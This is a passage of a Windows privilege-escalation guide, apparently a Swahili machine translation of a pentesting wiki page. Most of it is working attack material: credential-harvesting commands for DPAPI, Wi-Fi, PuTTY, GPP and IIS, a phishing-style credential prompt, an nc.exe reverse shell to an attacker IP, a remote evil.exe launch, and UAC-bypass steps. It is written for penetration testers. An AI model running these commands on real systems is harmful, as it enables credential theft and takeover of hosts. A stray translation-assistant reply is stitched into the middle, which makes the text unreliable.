for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

Kwa taarifa zaidi juu ya jinsi ya kutumia vibaya ukaguzi huu:

{{#ref}} dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md {{#endref}}

Mtandao

Sehemu za kushiriki

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

Angalia kompyuta nyingine zinazojulikana zilizo wekwa moja kwa moja kwenye hosts file

type C:\Windows\System32\drivers\etc\hosts

Violesura vya Mtandao & DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Bandari Zilizofunguka

Angalia kwa huduma zilizo na vikwazo kutoka nje

netstat -ano #Opened ports?

Jedwali la Routing

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

Jedwali la ARP

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Firewall Rules

Check this page for Firewall related commands (orodhesha kanuni, unda kanuni, zima, zima...)

Zaidi commands for network enumeration here

Windows Subsystem for Linux (wsl)

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

Binari bash.exe pia inaweza kupatikana katika C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Ikiwa unapata root user unaweza kusikiliza kwenye port yoyote (wakati wa kwanza unapotumia nc.exe kusikiliza kwenye port itakuuliza kupitia GUI kama nc inapaswa kuruhusiwa na firewall).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Ili kuanzisha bash kama root kwa urahisi, unaweza kujaribu --default-user root

Unaweza kuchunguza mfumo wa faili wa WSL katika folda C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Uthibitisho za Windows

Uthibitisho za Winlogon

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Credentials manager / Windows vault

From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
Windows Vault inahifadhi taarifa za kuingia za watumiaji kwa seva, tovuti na programu nyingine ambazo Windows inaweza kuingia watumiaji kiotomatikiy. Mwanzoni, hii inaweza kuonekana kwamba sasa watumiaji wanaweza kuhifadhi Facebook credentials, Twitter credentials, Gmail credentials n.k., ili waingie kiotomatiki kupitia browsers. Lakini sivyo.

Windows Vault inahifadhi credentials ambazo Windows inaweza kuingia watumiaji kiotomatiki, ambayo inamaanisha kwamba Windows application that needs credentials to access a resource (seva au tovuti) can make use of this Credential Manager & Windows Vault na kutumia credentials zilizotolewa badala ya watumiaji kuingiza jina la mtumiaji na nywila kila wakati.

Isipokuwa programu hizo zinaingiliana na Credential Manager, sidhani zitakuwa na uwezo wa kutumia credentials za rasilimali fulani. Kwa hiyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani kuwasiliana na credential manager na kuomba credentials za rasilimali hiyo kutoka kwenye default storage vault.

Tumia cmdkey kuorodhesha credentials zilizohifadhiwa kwenye mashine.

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Kisha unaweza kutumia runas na chaguo la /savecred ili kutumia credentials zilizohifadhiwa. Mfano ufuatao unaita binary ya mbali kupitia SMB share.

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

Kutumia runas na seti ya kredensiali zilizotolewa.

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Kumbuka kwamba mimikatz, lazagne, credentialfileview, VaultPasswordView, au kutoka Empire Powershells module.

DPAPI

The Data Protection API (DPAPI) inatoa njia ya usimbaji wa pamoja (symmetric) wa data, inayotumika zaidi ndani ya mfumo wa uendeshaji Windows kwa usimbaji wa pamoja wa funguo binafsi zisizo sawa (asymmetric). Usimbaji huu unatumia siri ya mtumiaji au ya mfumo ili kutoa mchango mkubwa kwa entropia.

DPAPI inaruhusu usimbaji wa funguo kupitia funguo ya symmetric inayotokana na siri za kuingia za mtumiaji. Katika matukio yanayohusisha usimbaji wa mfumo, inatumia siri za uthibitishaji za domain ya mfumo.

Funguo za RSA za mtumiaji zilizofichwa kwa kutumia DPAPI zimehifadhiwa katika %APPDATA%\Microsoft\Protect{SID} directory, where {SID} represents the user's Security Identifier. Funguo la DPAPI, lililoko pamoja na funguo kuu linalolinda funguo binafsi za mtumiaji katika faili ile ile, kwa kawaida linajumuisha 64 bytes za data za nasibu. (Ni muhimu kutambua kwamba ufikiaji wa kabrasha hiki umewekewa vizuizi, ukizuia kuorodhesha yaliyomo kwa kutumia amri dir katika CMD, ingawa yanaweza kuorodheshwa kupitia PowerShell).

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

Unaweza kutumia mimikatz module dpapi::masterkey na hoja zinazofaa (/pvk au /rpc) ili ku-decrypt.

Faili za credentials files protected by the master password kawaida zinapatikana katika:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Unaweza kutumia mimikatz module dpapi::cred pamoja na /masterkey inayofaa ili decrypt.
Unaweza kutoa masterkeys nyingi za DPAPI kutoka kumbukumbu kwa kutumia module sekurlsa::dpapi (kama wewe ni root).

{{#ref}} dpapi-extracting-passwords.md {{#endref}}

PowerShell Credentials

PowerShell credentials hutumika mara nyingi kwa scripting na kazi za kiotomatiki kama njia rahisi ya kuhifadhi credentials zilizofumwa. Credentials zinalindwa kwa kutumia DPAPI, ambayo kwa kawaida inamaanisha zinaweza tu kufunguliwa (decrypted) na mtumiaji yule yule kwenye kompyuta ileile zilipotengenezwa.

Ili decrypt PS credentials kutoka kwenye faili inayohifadhi, unaweza kufanya:

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

Wifi

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

Miunganisho ya RDP Zilizohifadhiwa

Unaweza kuzipata kwenye HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
na katika HKCU\Software\Microsoft\Terminal Server Client\Servers\

Amri Zilizotekelezwa Hivi Karibuni

HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Msimamizi wa Cheti za Remote Desktop

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Tumia Mimikatz dpapi::rdg module na /masterkey inayofaa ili decrypt any .rdg files
Unaweza extract many DPAPI masterkeys kutoka memory kwa kutumia Mimikatz sekurlsa::dpapi module

Sticky Notes

Watu mara nyingi hutumia app ya StickyNotes kwenye workstations za Windows ili save passwords na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko kwenye C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite na daima inafaa kutafutwa na kuchunguzwa.

AppCmd.exe

Kumbuka kuwa ili recover passwords kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha chini ya High Integrity level.
AppCmd.exe iko katika %systemroot%\system32\inetsrv\ directory.
Ikiwa faili hii ipo basi inawezekana kwamba baadhi ya credentials zimewekwa na zinaweza kuwa recovered.

Msimbo huu ulichukuliwa kutoka PowerUP:

function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"

# Check if appcmd.exe exists
if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable

# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")

# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

# Get application pool name
$PoolName = $_

# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd

# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd

# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}

# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

# Get Virtual Directory Name
$VdirName = $_

# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd

# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd

# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}

# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}

SCClient / SCCM

Angalia kama C:\Windows\CCM\SCClient.exe ipo .
Wasakinishaji huendeshwa run with SYSTEM privileges, wengi wapo hatarini kwa DLL Sideloading (Taarifa kutoka https://github.com/enjoiz/Privesc).

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

Mafaili na Registry (Credentials)

Putty Creds

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH Host Keys

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

SSH keys katika registry

SSH private keys zinaweza kuhifadhiwa ndani ya registry key HKCU\Software\OpenSSH\Agent\Keys, kwa hivyo unapaswa kuangalia kama kuna lolote la kuvutia huko:

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

Ikiwa utapata kipengee chochote ndani ya njia hiyo, kuna uwezekano ni saved SSH key. Imehifadhiwa encrypted lakini inaweza ku-decrypted kwa urahisi kwa kutumia https://github.com/ropnop/windows_sshagent_extract.
Taarifa zaidi kuhusu technique hii hapa: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

Ikiwa huduma ya ssh-agent haifanyi kazi na ungependa ianze kiotomatiki wakati wa boot, endesha:

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

Tip

Inaonekana mbinu hii haitumiki tena. Nilijaribu kuunda baadhi ya ssh keys, kuziongeza kwa ssh-add na kuingia kwa ssh kwenye mashine. Registry HKCU\Software\OpenSSH\Agent\Keys haipo na procmon haikutambua matumizi ya dpapi.dll wakati wa uthibitisho wa funguo asimetri.

Faili zisizoangaliwa

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Unaweza pia kutafuta faili hizi kwa kutumia metasploit: post/windows/gather/enum_unattend

Mfano wa maudhui:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>

<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

SAM & SYSTEM chelezo

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Cheti za Wingu

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

Tafuta faili liitwalo SiteList.xml

Nywila za GPP zilizohifadhiwa

Kipengele kilikuwa kinapatikana hapo awali kilichoruhusu kuanzishwa kwa akaunti za msimamizi wa ndani zilizobinafsishwa kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na kasoro kubwa za usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML katika SYSVOL, zingeweza kufikiwa na mtumiaji yoyote wa domain. Pili, nywila zilizomo ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia default key iliyodokumentishwa hadharani, zingeweza kufunguliwa na mtumiaji yeyote aliyethibitishwa. Hili liliweka hatari kubwa, kwani lingeweza kumruhusu mtumiaji kupata ruhusa za juu.

Ili kupunguza hatari hii, ilianzishwa function ya kuchunguza faili za GPP zilizohifadhiwa ndani zinazojumuisha field "cpassword" ambayo si tupu. Wakati inapopata faili kama hiyo, function huidecrypt nywila na kurudisha custom PowerShell object. Object hii inajumuisha maelezo kuhusu GPP na eneo la faili, ikisaidia katika utambuzi na kurekebisha udhaifu huu wa usalama.

Tafuta katika C:\ProgramData\Microsoft\Group Policy\history au katika C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (kabla ya W Vista) kwa faili hizi:

  • Groups.xml
  • Services.xml
  • Scheduledtasks.xml
  • DataSources.xml
  • Printers.xml
  • Drives.xml

Ili ku-decrypt cPassword:

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Kutumia crackmapexec kupata nywila:

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS Usanidi wa Web

Get-Childitem Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

Get-Childitem Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Mfano wa web.config yenye credentials:

<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>

Taarifa za kuingia za OpenVPN

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]

$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)

Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

Logs

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Uliza credentials

Unaweza kila wakati kumwomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine ikiwa unadhani anaweza kuzijua (kumbuka kwamba kuomba mteja moja kwa moja kwa credentials ni hatari sana):

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

Majina ya faili yanayoweza kuwa na credentials

Faili zilizojulikana ambazo muda fulani uliopita zilikuwa na passwords katika clear-text au Base64

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

I don't have the file contents. Please paste the contents of src/windows-hardening/windows-local-privilege-escalation/README.md (or provide the proposed files) you want translated to Swahili, and I'll translate them while preserving all markdown/html/tags/paths as requested.

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-Childitem Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

Kredenshali katika RecycleBin

Unapaswa pia kukagua Bin kutafuta kredenshali ndani yake

Ili kupona nywila zilizohifadhiwa na programu kadhaa unaweza kutumia: http://www.nirsoft.net/password_recovery_tools.html

Ndani ya rejista

Vifunguo vingine vya rejista vinavyoweza kuwa na kredenshali

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"

Extract openssh keys from registry.

Historia za vivinjari

Unapaswa kuangalia dbs ambapo nywila kutoka Chrome or Firefox zinahifadhiwa.
Pia angalia historia, bookmarks na favourites za vivinjari kwani labda baadhi ya nywila zimehifadhiwa hapo.

Zana za kutoa nywila kutoka kwa vivinjari:

COM DLL Overwriting

Component Object Model (COM) ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu mawasiliano kati ya vipengele vya programu vilivyotengenezwa kwa lugha tofauti. Kila sehemu ya COM inatambulishwa kupitia class ID (CLSID) na kila sehemu hutoa kazi kupitia moja au zaidi ya interfaces, zinazotambulishwa kupitia interface IDs (IIDs).

Darasa na interfaces za COM zimefafanuliwa katika registry chini ya HKEY\CLASSES\ROOT\CLSID na HKEY\CLASSES\ROOT\Interface mtawalia. Registry hii imeundwa kwa kuunganisha HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT.

Inside the CLSIDs of this registry you can find the child registry InProcServer32 which contains a default value pointing to a DLL and a value called ThreadingModel that can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).

Kimsingi, ikiwa utaweza overwrite any of the DLLs that are going to be executed, you could escalate privileges if that DLL is going to be executed by a different user.

To learn how attackers use COM Hijacking as a persistence mechanism check:

{{#ref}} com-hijacking.md {{#endref}}

Utafutaji wa nywila kwa ujumla katika faili na registry

Tafuta yaliyomo ndani ya faili

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

Tafuta faili yenye jina fulani

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Tafuta rejista kwa majina ya funguo na nywila

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Zana zinazotafuta passwords

MSF-Credentials Plugin is a msf plugin. Nimeunda plugin hii ili automatically execute every metasploit POST module that searches for credentials inside the victim.
Winpeas hufuatilia kiotomatiki faili zote zenye passwords zilizotajwa kwenye ukurasa huu.
Lazagne ni zana nyingine nzuri ya kutoa password kutoka kwenye mfumo.

Chombo SessionGopher hufuatilia sessions, usernames na passwords za zana kadhaa ambazo zinahifadhi data hii kwa clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

Fikiria kwamba mchakato unaoendesha kama SYSTEM unafungua mchakato mpya (OpenProcess()) kwa full access. Mchakato uleule pia huunda mchakato mpya (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Kisha, ikiwa una full access to the low privileged process, unaweza kunyakua open handle to the privileged process created na OpenProcess() na inject a shellcode.
Soma mfano huu kwa taarifa zaidi kuhusu jinsi ya kugundua na kutekeleza udhaifu huu.
Soma chapisho hiki kingine kwa maelezo kamili zaidi juu ya jinsi ya kujaribu na kutumia open handlers zaidi za michakato na threads zilizo inherited na viwango tofauti vya ruhusa (sio tu full access).

Named Pipe Client Impersonation

Sehemu za kumbukumbu zinazoshirikiwa, zinazoelezwa kama pipes, zinawezesha mawasiliano ya mchakato na uhamishaji wa data.

Windows inatoa kipengele kinachoitwa Named Pipes, kuruhusu michakato isiyohusiana kushiriki data, hata kwenye mitandao tofauti. Hii inafanana na usanifu wa client/server, ambapo majukumu yameainishwa kama named pipe server na named pipe client.

Wakati data inapotumwa kupitia pipe na client, server iliyoweka pipe hiyo ina uwezo wa kuchukua utambulisho wa client, iwe inapo kuwa na ruhusa za SeImpersonate zinazohitajika. Kutambua privileged process inayozungumza kupitia pipe unayoweza kuiga kunatoa fursa ya kupata higher privileges kwa kuchukua utambulisho wa mchakato huo mara itakaposhirikiana na pipe uliyoweka. Kwa maelekezo ya jinsi ya kutekeleza aina hiyo ya shambulio, mwongozo wenye msaada unaweza kupatikana hapa na hapa.

Vilevile zana ifuatayo inaruhusu intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept na zana hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs https://github.com/cyberark/PipeViewer

Mengine

File Extensions that could execute stuff in Windows

Angalia ukurasa https://filesec.io/

Monitoring Command Lines for passwords

Wakati unapopata shell kama mtumiaji, kunaweza kuwa na scheduled tasks au michakato mingine inayotekelezwa ambayo pass credentials on the command line. Script iliyo hapa chini inakamata process command lines kila sekunde mbili na ikalinganisha hali ya sasa na ile ya awali, ikitoa tofauti yoyote.

while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

Kuiba nywila kutoka kwa michakato

Kutoka Mtumiaji wa Vibali Vichache hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass

Ikiwa una ufikiaji wa kiolesura cha picha (via console au RDP) na UAC imewezeshwa, katika baadhi ya toleo za Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji bila vibali.

Hii inafanya iwezekane kuongeza vibali na kuipita UAC kwa wakati mmoja kwa udhaifu huo huo. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato, ime-signed na imetolewa na Microsoft.

Baadhi ya mifumo iliyoathirika ni zifuatazo:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

Ili kutumia udhaifu huu, ni lazima ufanye hatua zifuatazo:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

Una faili na taarifa zote muhimu katika GitHub repo ifuatayo:

https://github.com/jas502n/CVE-2019-1388

From Administrator Medium to High Integrity Level / UAC Bypass

Soma hii ili ujifunze kuhusu Integrity Levels:

{{#ref}} integrity-levels.md {{#endref}}

Kisha soma hii ili ujifunze kuhusu UAC na UAC bypasses:

{{#ref}} ../authentication-credentials-uac-and-efs/uac-user-account-control.md {{#endref}}

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

The technique described in this blog post with a exploit code available here.

